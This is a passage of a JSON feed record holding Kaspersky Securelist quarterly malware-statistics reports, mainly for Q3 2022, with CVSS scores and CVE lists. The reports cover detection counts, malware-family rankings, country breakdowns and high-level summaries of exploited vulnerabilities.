15.56% of users&#x27; computers at least once during the quarter. Russia scored 17.52% in this rating.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-08-12T10:00:12", "type": "securelist", "title": "IT threat evolution in Q2 2021. PC statistics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2017-8570", "CVE-2018-0802", "CVE-2020-1472", "CVE-2021-1675", "CVE-2021-21220", "CVE-2021-28310", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-31166", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-33742", "CVE-2021-34527"], "modified": "2021-08-12T10:00:12", "id": "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08", "href": "https://securelist.com/it-threat-evolution-in-q2-2021-pc-statistics/103607/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-30T12:08:22", "description": "\n\n * [IT threat evolution in Q3 2022](<https://securelist.com/it-threat-evolution-q3-2022/107957/>)\n * **IT threat evolution in Q3 2022. Non-mobile statistics**\n * [IT threat evolution in Q3 2022. Mobile statistics](<https://securelist.com/it-threat-evolution-in-q3-2022-mobile-statistics/107978/>)\n\n_These statistics are based on detection verdicts of Kaspersky products and services received from users who consented to providing statistical data._\n\n## Quarterly figures\n\nAccording to Kaspersky Security Network, in Q3 2022:\n\n * Kaspersky solutions blocked 956,074,958 attacks from online resources across the globe.\n * Web Anti-Virus recognized 251,288,987 unique URLs as malicious.\n * Attempts to run malware for stealing money from online bank accounts were stopped on the computers of 99,989 unique users.\n * Ransomware attacks were defeated on the computers of 72,941 unique users.\n * Our File Anti-Virus detected 49,275,253 unique malicious and potentially unwanted objects.\n\n## Financial threats\n\n### Number of users attacked by banking malware\n\nIn Q3 2022, Kaspersky solutions blocked the launch of at least one piece of banking malware on the computers of 99,989 unique users.\n\n_Number of unique users attacked by financial malware, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154318/01-en-malware-report-q3-2022-pc-stat.png>))_\n\n### TOP 10 banking malware families\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | Ramnit/Nimnul | Trojan-Banker.Win32.Ramnit | 33.2 \n2 | Zbot/Zeus | Trojan-Banker.Win32.Zbot | 15.2 \n3 | IcedID | Trojan-Banker.Win32.IcedID | 10.0 \n4 | CliptoShuffler | Trojan-Banker.Win32.CliptoShuffler | 5.8 \n5 | Trickster/Trickbot | Trojan-Banker.Win32.Trickster | 5.8 \n6 | SpyEye | Trojan-Spy.Win32.SpyEye | 2.1 \n7 | RTM | Trojan-Banker.Win32.RTM | 1.9 \n8 | Danabot | Trojan-Banker.Win32.Danabot | 1.4 \n9 | Tinba/TinyBanker | Trojan-Banker.Win32.Tinba | 1.4 \n10 | Gozi | Trojan-Banker.Win32.Gozi | 1.1 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\n### Geography of financial malware attacks\n\n**TOP 10 countries and territories by share of attacked users**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Turkmenistan | 4.7 \n2 | Afghanistan | 4.6 \n3 | Paraguay | 2.8 \n4 | Tajikistan | 2.8 \n5 | Yemen | 2.3 \n6 | Sudan | 2.3 \n7 | China | 2.0 \n8 | Switzerland | 2.0 \n9 | Egypt | 1.9 \n10 | Venezuela | 1.8 \n \n_* Excluded are countries and territories with relatively few Kaspersky users (under 10,000). \n** Unique users whose computers were targeted by financial malware as a percentage of all unique users of Kaspersky products in the country._\n\n## Ransomware programs\n\n### Quarterly trends and highlights\n\nThe third quarter of 2022 saw the builder for LockBit, a well-known ransomware, [leaked online](<https://www.bleepingcomputer.com/news/security/lockbit-ransomware-builder-leaked-online-by-angry-developer-/>). LockBit themselves attributed the leakage to one of their developers&#x27; personal initiative, not the group&#x27;s getting hacked. One way or another, the LockBit 3.0 build kit is now accessible to the broader cybercriminal community. Similarly to other ransomware families in the past, such as Babuk and Conti, Trojan builds generated with the leaked builder began to serve other groups unrelated to LockBit. One example was Bloody/Bl00dy [spotted back in May](<https://www.bleepingcomputer.com/news/security/leaked-lockbit-30-builder-used-by-bl00dy-ransomware-gang-in-attacks/>). A borrower rather than a creator, this group added the freshly available LockBit to its arsenal in September 2022.\n\nMass attacks on NAS (network attached storage) devices continue. QNAP issued warnings about Checkmate and Deadbolt infections in Q3 2022. The [former](<https://www.qnap.com/en/security-advisory/QSA-22-21>) threatened files accessible from the internet over SMB protocol and protected by a weak account password. The latter [attacked](<https://www.qnap.com/en/security-news/2022/take-immediate-action-to-update-photo-station-to-the-latest-available-version>) devices that had a vulnerable version of the Photo Station software installed. Threats that target NAS remain prominent, so we recommend keeping these devices inaccessible from the internet to ensure maximum safety of your data.\n\nThe United States Department of Justice [announced](<https://www.justice.gov/opa/pr/justice-department-seizes-and-forfeits-approximately-500000-north-korean-ransomware-actors>) that it had teamed up with the FBI to seize about $500,000 paid as ransom after a Maui ransomware attack. The Trojan was likely [used](<https://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/>) by the North Korean operators Andariel. The DOJ said victims had started getting their money back.\n\nThe creators of the little-known AstraLocker and Yashma ransomware [published](<https://www.bleepingcomputer.com/news/security/astralocker-ransomware-shuts-down-and-releases-decryptors/>) decryptors and stopped spreading both of them. The hackers provided no explanation for the move, but it appeared to be related to an increase in media coverage.\n\n### Number of new modifications\n\nIn Q3 2022, we detected 17 new ransomware families and 14,626 new modifications of this malware type. More than 11,000 of those were assigned the verdict of Trojan-Ransom.Win32.Crypmod, which hit the sixth place in our rankings of the most widespread ransomware Trojans.\n\n_Number of new ransomware modifications, Q3 2021 \u2014 Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154421/03-en-ru-es-malware-report-q3-2022-pc-stat.png>))_\n\n### Number of users attacked by ransomware Trojans\n\nIn Q3 2022, Kaspersky products and technologies protected 72,941 users from ransomware attacks.\n\n_Number of unique users attacked by ransomware Trojans, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154500/04-en-malware-report-q3-2022-pc-stat.png>))_\n\n**TOP 10 most common families of ransomware Trojans**\n\n| **Name** | **Verdicts** | **%*** \n---|---|---|--- \n1 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 14.76 \n2 | WannaCry | Trojan-Ransom.Win32.Wanna | 12.12 \n3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 11.68 \n4 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 6.59 \n5 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.53 \n6 | (generic verdict) | Trojan-Ransom.Win32.Crypmod \n7 | Magniber | Trojan-Ransom.Win64.Magni | 4.93 \n8 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 4.84 \n9 | (generic verdict) | Trojan-Ransom.Win32.Instructions | 4.35 \n10 | Hive | Trojan-Ransom.Win32.Hive | 3.87 \n \n_* Unique users who encountered this malware family as a percentage of all users attacked by financial malware._\n\n### Geography of attacked users\n\n**TOP 10 countries and territories attacked by ransomware Trojans**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Bangladesh | 1.66 \n2 | Yemen | 1.30 \n3 | South Korea | 0.98 \n4 | Taiwan | 0.77 \n5 | Mozambique | 0.64 \n6 | China | 0.52 \n7 | Colombia | 0.43 \n8 | Nigeria | 0.40 \n9 | Pakistan | 0.39 \n10 | Venezuela | 0.32 \n \n_* Excluded are countries with relatively few Kaspersky users (under 50,000). \n** Unique users whose computers were attacked by ransomware Trojans as a percentage of all unique users of Kaspersky products in the country._\n\n### TOP 10 most common families of ransomware Trojans\n\n| **Name** | **Verdicts*** | **Percentage of attacked users**** \n---|---|---|--- \n1 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 14.76 \n2 | WannaCry | Trojan-Ransom.Win32.Wanna | 12.12 \n3 | (generic verdict) | Trojan-Ransom.Win32.Gen | 11.68 \n4 | Stop/Djvu | Trojan-Ransom.Win32.Stop | 6.59 \n5 | (generic verdict) | Trojan-Ransom.Win32.Phny | 6.53 \n6 | (generic verdict) | Trojan-Ransom.Win32.Crypmod | 5.46 \n7 | Magniber | Trojan-Ransom.Win64.Magni | 4.93 \n8 | PolyRansom/VirLock | Trojan-Ransom.Win32.PolyRansom / Virus.Win32.PolyRansom | 4.84 \n9 | (generic verdict) | Trojan-Ransom.Win32.Instructions | 4.35 \n10 | Hive | Trojan-Ransom.Win32.Hive | 3.87 \n \n_* Statistics are based on detection verdicts of Kaspersky products. The information was provided by Kaspersky product users who consented to providing statistical data. \n** Unique Kaspersky users attacked by specific ransomware Trojan families as a percentage of all unique users attacked by ransomware Trojans._\n\n## Miners\n\n### Number of new miner modifications\n\nIn Q3 2022, Kaspersky systems detected 153,773 new miner mods. More than 140,000 of these were found in July and August; combined with June&#x27;s figure of more than 35,000, this suggests that miner creators kept themselves abnormally busy this past summer.\n\n_Number of new miner modifications, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154533/06-en-malware-report-q3-2022-pc-stat.png>))_\n\n### Number of users attacked by miners\n\nIn Q3, we detected attacks that used miners on the computers of 432,363 unique users of Kaspersky products worldwide. A quieter period from late spring through the early fall was followed by another increase in activity.\n\n_Number of unique users attacked by miners, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154601/07-en-malware-report-q3-2022-pc-stat.png>))_\n\n### Geography of miner attacks\n\n**TOP 10 countries and territories attacked by miners**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Ethiopia | 2.38 \n2 | Kazakhstan | 2.13 \n3 | Uzbekistan | 2.01 \n4 | Rwanda | 1.93 \n5 | Tajikistan | 1.83 \n6 | Venezuela | 1.78 \n7 | Kyrgyzstan | 1.73 \n8 | Mozambique | 1.57 \n9 | Tanzania | 1.56 \n10 | Ukraine | 1.54 \n \n_* Excluded are countries and territories with relatively few users of Kaspersky products (under 50,000). \n** Unique users attacked by miners as a percentage of all unique users of Kaspersky products in the country._\n\n## Vulnerable applications used by criminals during cyberattacks\n\n### Quarterly highlights\n\nQ3 2022 was remembered for a series of vulnerabilities discovered in various software products. Let&#x27;s begin with Microsoft Windows and some of its components. Researchers found new vulnerabilities that affected the CLFS driver: [CVE-2022-30220](<https://nvd.nist.gov/vuln/detail/CVE-2022-30220>), along with [CVE-2022-35803](<https://nvd.nist.gov/vuln/detail/CVE-2022-35803>) and [CVE-2022-37969](<https://nvd.nist.gov/vuln/detail/CVE-2022-37969>), both encountered in the wild. By manipulating Common Log File System data in a specific way, an attacker can make the kernel write their own data to arbitrary memory addresses, allowing cybercriminals to hijack kernel control and elevate their privileges in the system. Several vulnerabilities were discovered in the Print Spooler service: [CVE-2022-22022](<https://nvd.nist.gov/vuln/detail/CVE-2022-22022>), [CVE-2022-30206](<https://nvd.nist.gov/vuln/detail/CVE-2022-30206>), and [CVE-2022-30226](<https://nvd.nist.gov/vuln/detail/CVE-2022-30226>). These allow elevating the system privileges through a series of manipulations while installing a printer. Serious vulnerabilities were also discovered in the Client/Server Runtime Subsystem (CSRSS), an essential Windows component. Some of these can be exploited for privilege escalation ([CVE-2022-22047](<https://nvd.nist.gov/vuln/detail/CVE-2022-22047>), [CVE-2022-22049](<https://nvd.nist.gov/vuln/detail/CVE-2022-22049>), and [CVE-2022-22026](<https://nvd.nist.gov/vuln/detail/CVE-2022-22026>)), while [CVE-2022-22038](<https://nvd.nist.gov/vuln/detail/CVE-2022-22038>) affects remote procedure call (RPC) protocol, allowing an attacker to execute arbitrary code remotely. A series of critical vulnerabilities were discovered in the graphics subsystem, including [CVE-2022-22034](<https://nvd.nist.gov/vuln/detail/CVE-2022-22034>) and [CVE-2022-35750](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35750>), which can also be exploited for privilege escalation. Note that most of the above vulnerabilities require that exploits entrench in the system before an attacker can run their malware. The Microsoft Support Diagnostic Tool (MSDT) was found to contain a further two vulnerabilities, [CVE-2022-34713](<https://nvd.nist.gov/vuln/detail/CVE-2022-34713>) and [CVE-2022-35743](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35743>), which can be exploited to take advantage of security flaws in the link handler to remotely run commands in the system.\n\nMost of the network threats detected in Q3 2022 were again attacks associated with [brute-forcing](<https://encyclopedia.kaspersky.com/glossary/brute-force/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) passwords for Microsoft SQL Server, RDP, and other services. Network attacks on vulnerable versions of Windows via EternalBlue, EternalRomance, and other exploits were still common. The attempts at exploiting network services and other software via vulnerabilities in the Log4j library ([CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>), [CVE-2021-44832](<https://nvd.nist.gov/vuln/detail/CVE-2021-44832>), [CVE-2021-45046](<https://nvd.nist.gov/vuln/detail/CVE-2021-45046>), and [CVE-2021-45105](<https://nvd.nist.gov/vuln/detail/cve-2021-45105>)) also continued. Several vulnerabilities were found in the Microsoft Windows Network File System (NFS) driver. These are [CVE-2022-22028](<https://nvd.nist.gov/vuln/detail/CVE-2022-22028>), which can lead to leakage of confidential information, as well as [CVE-2022-22029](<https://nvd.nist.gov/vuln/detail/CVE-2022-22029>), [CVE-2022-22039](<https://nvd.nist.gov/vuln/detail/CVE-2022-22039>) and [CVE-2022-34715](<https://nvd.nist.gov/vuln/detail/CVE-2022-34715>), which a cybercriminal can use to remotely execute arbitrary code in the system \u2014 in kernel context \u2014 by using a specially crafted network packet. The TCP/IP stack was found to contain the critical vulnerability [CVE-2022-34718](<https://nvd.nist.gov/vuln/detail/CVE-2022-34718>), which allows in theory to remotely exploit a target system by taking advantage of errors in the IPv6 protocol handler. Finally, it is worth mentioning the [CVE-2022-34724](<https://nvd.nist.gov/vuln/detail/CVE-2022-34724>) vulnerability, which affects Windows DNS Server and can lead to denial of service if exploited.\n\nTwo vulnerabilities in Microsoft Exchange Server, [CVE-2022-41040](<https://nvd.nist.gov/vuln/detail/CVE-2022-41040>) and [CVE-2022-41082](<https://nvd.nist.gov/vuln/detail/CVE-2022-41082>), received considerable media coverage. They were collectively dubbed &quot;ProxyNotShell&quot; in reference to the ProxyShell vulnerabilities with similar exploitation technique (they were closed earlier). Researchers discovered the ProxyNotShell exploits while investigating an APT attack: an authenticated user can use the loopholes to elevate their privileges and run arbitrary code on an MS Exchange server. As a result, the attacker can steal confidential data, encrypt critical files on the server to to extort money from the victim, etc.\n\n### Vulnerability statistics\n\nIn Q3 2022, malicious Microsoft Office documents again accounted for the greatest number of detections \u2014 80% of the exploits we discovered, although the number decreased slightly compared to Q2. Most of these detections were triggered by exploits that targeted the following vulnerabilities:\n\n * [CVE-2018-0802](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0802>) and [CVE-2017-11882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882>), in the Equation Editor component, which allow corrupting the application memory when processing formulas, and subsequently running arbitrary code in the system;\n * [CVE-2017-0199](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0199>), which allows downloading and running malicious script files;\n * [CVE-2022-30190](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30190>), also known as &quot;Follina&quot;, which exploits a flaw in the Microsoft Windows Support Diagnostic Tool (MSDT) for running arbitrary programs in a vulnerable system even in Protected Mode or when macros are disabled;\n * [CVE-2021-40444](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-40444>), which allows an attacker to deploy malicious code using a special ActiveX template due to inadequate input validation.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154631/09-en-malware-report-q3-2022-pc-stat.png>))_\n\nThese were followed by exploits that target browsers. Their share amounted to 6%, or 1% higher than in Q2. We will list the most serious vulnerabilities, all of them targeting Google Chrome:\n\n * [CVE-2022-2294](<https://nvd.nist.gov/vuln/detail/CVE-2022-2294>), in the WebRTC component, which leads to buffer overflow;\n * [CVE-2022-2624](<https://nvd.nist.gov/vuln/detail/CVE-2022-2624>), which exploits a memory overflow error in the PDF viewing component;\n * [CVE-2022-2295](<https://nvd.nist.gov/vuln/detail/CVE-2022-2295>), a Type Confusion error that allows an attacker to corrupt the browser process memory remotely and run arbitrary code in a sandbox;\n * [CVE-2022-3075](<https://nvd.nist.gov/vuln/detail/CVE-2022-3075>), an error linked to inadequate input validation in the Mojo interprocess communication component in Google Chromium-based browsers that allows escaping the sandbox and running arbitrary commands in the system.\n\nSince many modern browsers are based on Google Chromium, attackers can often take advantage of the shared vulnerabilities to attack the other browsers as long as they run on one engine.\n\nA series of vulnerabilities were identified in Microsoft Edge. Worth noting is [CVE-2022-33649](<https://nvd.nist.gov/vuln/detail/CVE-2022-33649>), which allows running an application in the system by circumventing the browser protections; [CVE-2022-33636](<https://nvd.nist.gov/vuln/detail/CVE-2022-33636>) and [CVE-2022-35796](<https://nvd.nist.gov/vuln/detail/CVE-2022-35796>), Race Condition vulnerabilities that ultimately allow a sandbox escape; and [CVE-2022-38012](<https://nvd.nist.gov/vuln/detail/CVE-2022-38012>), which exploits an application memory corruption error, with similar results.\n\nThe Mozilla Firefox browser was found to contain vulnerabilities associated with memory corruption, which allow running arbitrary code in the system: [CVE-2022-38476](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38476>), a Race Condition vulnerability that leads to a subsequent Use-After-Free scenario, and the similar vulnerabilities [CVE-2022-38477](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38477>) and [CVE-2022-38478](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38478>), which exploit memory corruption. As you can see from our reports, browsers are an attractive target for cybercriminals, as these are widely used and allow attackers to infiltrate the system remotely and virtually unbeknownst to the user. That said, browser vulnerabilities are not simple to exploit, as attackers often have to use a chain of vulnerabilities to work around the protections of modern browsers.\n\nThe remaining positions in our rankings were distributed among Android (5%) and Java (4%) exploits. The fifth-highest number of exploits (3%) targeted Adobe Flash, a technology that is obsolete but remains in use. Rounding out the rankings with 2% were exploits spread through PDF documents.\n\n## Attacks on macOS\n\nThe third quarter of 2022 brought with it a significant number of interesting macOS malware discoveries. In particular, researchers found [Operation In(ter)ception](<https://www.sentinelone.com/blog/lazarus-operation-interception-targets-macos-users-dreaming-of-jobs-in-crypto/>), a campaign operated by North Korean Lazarus group, which targets macOS users looking for cryptocurrency jobs. The malware was disguised as documents containing summaries of positions at Coinbase and Crypto.com.\n\n[CloudMensis](<https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/>), a spy program written in Objective-C, used cloud storage services as C&amp;C servers and [shared several characteristics](<https://twitter.com/ESETresearch/status/1575103839115804672>) with the RokRAT Windows malware operated by ScarCruft.\n\nThe creators of XCSSET [adapted](<https://www.sentinelone.com/blog/xcsset-malware-update-macos-threat-actors-prepare-for-life-without-python/>) their toolset to macOS Monterey and migrated from Python 2 to Python 3.\n\nIn Q3, cybercrooks also began to make use of open-source tools in their attacks. July saw the discovery of two campaigns that used a fake [VPN application](<https://www.sentinelone.com/blog/from-the-front-lines-new-macos-covid-malware-masquerades-as-apple-wears-face-of-apt/>) and fake [Salesforce updates](<https://twitter.com/ESETresearch/status/1547943014860894210>), both built on the Sliver framework.\n\nIn addition to this, researchers announced a new multi-platform [find](<https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/>): the LuckyMouse group (APT27 / Iron Tiger / Emissary Panda) attacked Windows, Linux, and macOS users with a malicious mod of the Chinese MiMi instant messaging application.\n\n### TOP 20 threats for macOS\n\n| **Verdict** | **%*** \n---|---|--- \n1 | AdWare.OSX.Amc.e | 14.77 \n2 | AdWare.OSX.Pirrit.ac | 10.45 \n3 | AdWare.OSX.Agent.ai | 9.40 \n4 | Monitor.OSX.HistGrabber.b | 7.15 \n5 | AdWare.OSX.Pirrit.j | 7.10 \n6 | AdWare.OSX.Bnodlero.at | 6.09 \n7 | AdWare.OSX.Bnodlero.ax | 5.95 \n8 | Trojan-Downloader.OSX.Shlayer.a | 5.71 \n9 | AdWare.OSX.Pirrit.ae | 5.27 \n10 | Trojan-Downloader.OSX.Agent.h | 3.87 \n11 | AdWare.OSX.Bnodlero.bg | 3.46 \n12 | AdWare.OSX.Pirrit.o | 3.32 \n13 | AdWare.OSX.Agent.u | 3.13 \n14 | AdWare.OSX.Agent.gen | 2.90 \n15 | AdWare.OSX.Pirrit.aa | 2.85 \n16 | Backdoor.OSX.Twenbc.e | 2.85 \n17 | AdWare.OSX.Ketin.h | 2.82 \n18 | AdWare.OSX.Pirrit.gen | 2.69 \n19 | Trojan-Downloader.OSX.Lador.a | 2.52 \n20 | Downloader.OSX.InstallCore.ak | 2.28 \n \n_* Unique users who encountered this malware as a percentage of all users of Kaspersky security solutions for macOS who were attacked._\n\nAs usual, our TOP 20 ranking for biggest threats encountered by users of Kaspersky security solutions for macOS were dominated by adware. AdWare.OSX.Amc.e, touted as &quot;Advanced Mac Cleaner,&quot; had taken the top place for a second quarter in a row. This application displays fake system issue messages, offering to buy the full version to fix those. Second and third places went to members of the AdWare.OSX.Pirrit and AdWare.OSX.Agent families.\n\n### Geography of threats for macOS\n\n**TOP 10 countries and territories by share of attacked users**\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | France | 1.71 \n2 | Canada | 1.70 \n3 | Russia | 1.57 \n4 | India | 1.53 \n5 | United States | 1.52 \n6 | Spain | 1.48 \n7 | Australia | 1.36 \n8 | Italy | 1.35 \n9 | Mexico | 1.27 \n10 | United Kingdom | 1.24 \n \n_* Excluded from the rankings are countries with relatively few users of Kaspersky security solutions for macOS (under 10,000). \n** Unique users attacked as a percentage of all users of Kaspersky security solutions for macOS in the country._\n\nFrance, with 1.71%, was again the most attacked country by number of users. Canada, with 1.70%, and Russia, with 1.57%, followed close behind. The most frequently encountered family in France and Canada was AdWare.OSX.Amc.e, and in Russia, it was AdWare.OSX.Pirrit.ac.\n\n## IoT attacks\n\n### IoT threat statistics\n\nIn Q3 2022, three-fourths of the devices that attacked Kaspersky honeypots used the Telnet protocol.\n\nTelnet | 75.92% \n---|--- \nSSH | 24.08% \n \n_Distribution of attacked services by number of unique IP addresses of attacking devices, Q3 2022_\n\nA majority of the attacks on Kaspersky honeypots in terms of sessions were controlled via Telnet as well.\n\nTelnet | 97.53% \n---|--- \nSSH | 2.47% \n \n_Distribution of cybercriminal working sessions with Kaspersky traps, Q3 2022_\n\n**TOP 10 threats delivered to IoT devices via Telnet**\n\n| **Verdict** | **%*** \n---|---|--- \n1 | Backdoor.Linux.Mirai.b | 28.67 \n2 | Trojan-Downloader.Linux.NyaDrop.b | 18.63 \n3 | Backdoor.Linux.Mirai.ba | 11.63 \n4 | Backdoor.Linux.Mirai.cw | 10.94 \n5 | Backdoor.Linux.Gafgyt.a | 3.69 \n6 | Backdoor.Linux.Mirai.ew | 3.49 \n7 | Trojan-Downloader.Shell.Agent.p | 2.56 \n8 | Backdoor.Linux.Gafgyt.bj | 1.63 \n9 | Backdoor.Linux.Mirai.et | 1.17 \n10 | Backdoor.Linux.Mirai.ek | 1.08 \n \n_* Share of each threat delivered to infected devices as a result of a successful Telnet attack out of the total number of delivered threats._\n\nDetailed IoT-threat statistics are published in the DDoS report for Q3 2022.\n\n## Attacks via web resources\n\n_The statistics in this section are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Cybercriminals create these sites on purpose; they can infect hacked legitimate resources as well as web resources with user-created content, such as forums._\n\n### Countries and territories that serve as sources of web-based attacks: TOP 10\n\n_The following statistics show the distribution by country or territory of the sources of internet attacks blocked by Kaspersky products on user computers (web pages with redirects to exploits, sites hosting malicious programs, botnet C&amp;C centers, etc.). Any unique host could be the source of one or more web-based attacks._\n\n_To determine the geographic source of web attacks, the GeoIP technique was used to match the domain name to the real IP address at which the domain is hosted._\n\nIn Q3 2022, Kaspersky solutions blocked 956,074,958 attacks launched from online resources across the globe. A total of 251,288,987 unique URLs were recognized as malicious by Web Anti-Virus components.\n\n_Distribution of web-attack sources country and territory, Q3 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/11/15154703/11-en-malware-report-q3-2022-pc-stat.png>))_\n\n### Countries and territories where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries and territories, for each country or territory we calculated the percentage of Kaspersky users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries and territories.\n\nNote that these rankings only include attacks by malicious objects that fall under the **_Malware_**_ class_; they do not include Web Anti-Virus detections of potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Taiwan | 19.65 \n2 | Belarus | 17.01 \n3 | Serbia | 15.05 \n4 | Russia | 14.12 \n5 | Algeria | 14.01 \n6 | Turkey | 13.82 \n7 | Tunisia | 13.31 \n8 | Bangladesh | 13.30 \n9 | Moldova | 13.22 \n10 | Palestine | 12.61 \n11 | Yemen | 12.58 \n12 | Ukraine | 12.25 \n13 | Libya | 12.23 \n14 | Sri Lanka | 11.97 \n15 | Kyrgyzstan | 11.69 \n16 | Estonia | 11.65 \n17 | Hong Kong | 11.52 \n18 | Nepal | 11.52 \n19 | Syria | 11.39 \n20 | Lithuania | 11.33 \n \n_* Excluded are countries and territories with relatively few Kaspersky users (under 10,000)._ \n_** Unique users targeted by **Malware**-class attacks as a percentage of all unique users of Kaspersky products in the country._\n\nOn average during the quarter, 9.08% of internet users&#x27; computers worldwide were subjected to at least one **Malware**-class web attack.\n\n## Local threats\n\n_In this section, we analyze statistical data obtained from the OAS and ODS modules of Kaspersky products. It takes into account malicious programs that were found directly on users&#x27; computers or removable media connected to them (flash drives, camera memory cards, phones, external hard drives), or which initially made their way onto the computer in non-open form (for example, programs in complex installers, encrypted files, etc.)._\n\nIn Q3 2022, our File Anti-Virus detected **49,275,253** malicious and potentially unwanted objects.\n\n### Countries and territories where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nThese rankings only include attacks by malicious programs that fall under the **Malware** class; they do not include File Anti-Virus triggerings in response to potentially dangerous or unwanted programs, such as RiskTool or adware.\n\n| **Country or territory*** | **%**** \n---|---|--- \n1 | Turkmenistan | 46.48 \n2 | Yemen | 45.12 \n3 | Afghanistan | 44.18 \n4 | Cuba | 40.48 \n5 | Tajikistan | 39.17 \n6 | Bangladesh | 37.06 \n7 | Uzbekistan | 37.00 \n8 | Ethiopia | 36.96 \n9 | South Sudan | 36.89 \n10 | Myanmar | 36.64 \n11 | Syria | 34.82 \n12 | Benin | 34.56 \n13 | Burundi | 33.91 \n14 | Tanzania | 33.05 \n15 | Rwanda | 33.03 \n16 | Chad | 33.01 \n17 | Venezuela | 32.79 \n18 | Cameroon | 32.30 \n19 | Sudan | 31.93 \n20 | Malawi | 31.88 \n \n_* Excluded are countries with relatively few Kaspersky users (under 10,000)._ \n_** Unique users on whose computers **Malware**-class local threats were blocked, as a percentage of all unique users of Kaspersky products in the country._\n\nOn average worldwide, Malware-class local threats were registered on 14.74% of users&#x27; computers at least once during Q3. Russia scored 16.60% in this ranking.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-11-18T08:10:34", "type": "securelist", "title": "IT threat evolution in Q3 2022. Non-mobile statistics", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2017-11882", "CVE-2018-0802", 